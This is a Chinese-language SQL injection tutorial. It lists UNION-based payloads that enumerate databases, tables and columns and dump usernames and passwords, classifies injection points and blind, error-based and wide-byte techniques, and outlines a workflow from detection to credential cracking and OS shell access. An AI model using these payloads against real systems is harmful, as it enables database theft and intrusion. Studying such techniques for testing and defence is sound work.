sql注入是什么?
SQL注入攻击是利用网站程序漏洞,通过提交恶意构造的SQL语句,以达到窃 取、修改、破坏数据库为目的的攻击。
可以用来注入的地址,比如说某个请求会发送某个参数,而这个参数在后台用于作为数据库查询的拼接字段,且未完全过滤,那么这个点就有可能是一个注入点
基本语句
order by 4--+
判断有多少列
union select 1,2,3--+
判断数据显示点
union select 1,user(),database()--+
显示出登录用户和数据库名
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'--+
查看数据库有哪些表
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'--+
查看对应表有哪些列
union select 1,2,group_concat(username,'~'password) from users--+
查看账号密码信息
注入点类型来分类
- 数字型注入点
当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。
1)加单引号,URL:http://xxx.xx:xxxx/new_list.php?id=1’ 对应的sql:select * from
table where id=1’这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常
2)加单引号,URL:http://xxx.xx:xxxx/new_list.php?id=1’ 对应的sql:select * from
table where id=1’这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常;
3)加and 1=2,URL:http://xxx.xx:xxxx/new_list.php?id=1 and 1=2
对应的sql:select * from table where id=1 and 1=2
语句可以正常执行,但是无法查询出结果,所以返回数据与原始网页存在差异
如果满足以上三点,则可以判断该URL存在数字型注入。 - 字符型注入点
当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。
例如数字型语句:select * from table where id=1 则字符型:select * from table where name=‘root’
因此,通过闭合单引号可以成功执行语句:组合出来的sql注入语句为:select * from table where name=‘root’ and 1=1 ’ ’
测试步骤:
1)加单引号:select * from table where name=’admin’’
由于加单引号后变成三个单引号,则无法执行,程序会报错;
2)加 ’and 1=1 此时sql 语句为:select * from table where name=’admin’ and 1=1’ ,也无法进行注入,还需要通过注释符号将其绕过;
Mysql 有三种常用注释符:
– 注意,这种注释符后边有一个空格
通过#进行注释
/* */ 注释掉符号内的内容
因此,构造语句为:select * from table where name =’admin’ and 1=1—’ 可成功执行返回结果正确;
3) 加and 1=2— 此时sql语句为:select * from table where name=’admin’ and 1=2 –’则会报错
如果满足以上三点,可以判断该url为字符型注入。 - 搜索型注入点
%xxx%
数据提交的方式来分类
- GET 注入
Get注入可以直接在url修改参数,提交数据的方式是 GET 比如有这样的一个Url 地址链接http://xxx.xx:xxxx/new_list.php?id=1 id就是注入点 - POST 注入
Post注入要在输入框(请求正文)中修改参数 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 - Cookie 注入
HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中。 - HTTP 头部注入
注入点在 HTTP 请求头部的某个字段中。比如存在 User-Agent 字段中。严格讲的话,Cookie 其实应该也是算头部注入的一种形式。因为在 HTTP 请求的时候,Cookie 是头部的一个字段。
执行效果来分类
- 基于布尔的盲注 可以根据返回页面判断条件真假的注入
- 基于时间的盲注 不能根据页面返回内容判断任何信息,攻击者通过注入延时语句(比如sleep )强制数据库延时一种长的时间,用于判断某条判断语句是TRUE还是FALSE,从而间接地猜测数据库中的数据。
- 基于报错注入 页面会返回错误信息,或者把注入的语句的结果直接返回在页面中
- 联合查询注入 可以使用union的情况下的注入。
- 堆查询注入 可以同时执行多条语句的执行时的注入
- 宽字节注入 利用编码转换,将服务器端强制添加的本来用于转义的\符号吃掉,从而能使攻击者输入的引号起到闭合作用,以至于可以进行SQL注入
- base64注入 注入字符经过base64编码后注入
等等
Get注入可以直接在url修改参数 Post注入要在输入框(请求正文)中修改参数
sql注入流程:
获取数据库数据库,提权
1.判断是否有sql注入漏洞,有则判断注入点类型
2.判断操作系统,数据库和web应用的类型
3.获取数据库信息,包括管理员信息及拖库
4.加密信息破解,sqlmap 破解
5.提升权限,获得sql-shell,os-shell,登录后台
…